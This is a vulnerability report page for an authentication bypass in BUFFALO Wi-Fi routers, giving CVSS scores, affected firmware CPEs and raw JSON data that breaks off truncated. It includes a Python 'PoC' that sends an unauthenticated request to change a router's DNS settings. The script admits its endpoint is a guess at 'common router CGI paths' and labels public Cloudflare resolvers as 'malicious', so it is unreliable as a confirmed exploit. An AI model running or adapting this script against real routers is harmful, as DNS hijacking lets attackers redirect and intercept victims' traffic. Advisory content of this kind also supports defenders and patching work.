Security Vulnerability Report
中文
CVE-2026-32678 CVSS 7.5 HIGH

CVE-2026-32678

Published: 2026-03-27 06:16:39
Last Modified: 2026-03-31 19:03:49

Description

Authentication bypass issue exists in BUFFALO Wi-Fi router products, which may allow an attacker to alter critical configuration settings without authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:buffalo:wzr-s900dhp_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:buffalo:wzr-s900dhp:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:buffalo:wcr-1166dhpl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:buffalo:wcr-1166dhpl:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:buffalo:wsr3600be4-kh_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:buffalo:wsr3600be4-kh:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:buffalo:wsr3600be4p_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:buffalo:wsr3600be4p:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:buffalo:wxr-1750dhp_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:buffalo:wxr-1750dhp:-:*:*:*:*:*:*:* - NOT VULNERABLE
BUFFALO Wi-Fi router products (具体受影响型号和版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_ip): """ PoC for CVE-2026-32678 Authentication Bypass This script attempts to change the DNS settings without authentication. """ # Target endpoint (example based on common router CGI paths) url = f"http://{target_ip}/cgi-bin/cgi_system" # Malicious payload to change DNS settings payload = { "action": "apply", "dns_mode": "manual", "dns_primary": "1.1.1.1", # Malicious DNS server "dns_secondary": "1.0.0.1" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded", "Referer": f"http://{target_ip}/" } try: print(f"[*] Sending exploit request to {target_ip}...") # No authentication header is sent, exploiting the bypass response = requests.post(url, data=payload, headers=headers, timeout=5) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Exploit successful! Configuration may have been altered.") else: print(f"[-] Exploit failed or target not vulnerable. Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") if __name__ == "__main__": target = "192.168.11.1" # Replace with actual target IP exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32678", "sourceIdentifier": "[email protected]", "published": "2026-03-27T06:16:38.650", "lastModified": "2026-03-31T19:03:48.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication bypass issue exists in BUFFALO Wi-Fi router products, which may allow an attacker to alter critical configuration settings without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:buffalo:wzr-s900dhp_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB08C247-2C08-4E90-9D26-D6FC878E7FDC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:buffalo:wzr-s900dhp:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7C186F6-8DE5-4C82-8403-D3BB76069FCE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:buffalo:wcr-1166dhpl_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.01", "matchCriteriaId": "70DE69B3-85D4-4FEF-AC34-3ED1BCA72455"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:buffalo:wcr-1166dhpl:-:*:*:*:*:*:*:*", "matchCriteriaId": "52B41DFC-E60C-4BFF-8AB2-C6FB67194F98"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:buffalo:wsr3600be4-kh_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.02", "matchCriteriaId": "57CD1A07-ADEB-43C6-BBD6-50F5CA3A1AAF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:buffalo:wsr3600be4-kh:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E3EE1F5-07F2-428D-B5EB-071657EBCA96"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:buffalo:wsr3600be4p_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.02", "matchCriteriaId": "C6610DCC-EAEC-4464-880A-F19D7D823FEA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:buffalo:wsr3600be4p:-:*:*:*:*:*:*:*", "matchCriteriaId": "FD39E5F5-860E-4532-8E83-A6E36B30510E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:buffalo:wxr-1750dhp_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.63", "matchCriteriaId": "DED9D3D6-D64E-4E23-ACAF-02183CC8C619"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:buffalo:wxr-1750dhp:-:*:*:*:*:*:*:*", "matchCriteriaId": "22CD8F33-A455-4E4B-9351-CBBDA511E9D7"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:buffalo:w ... (truncated)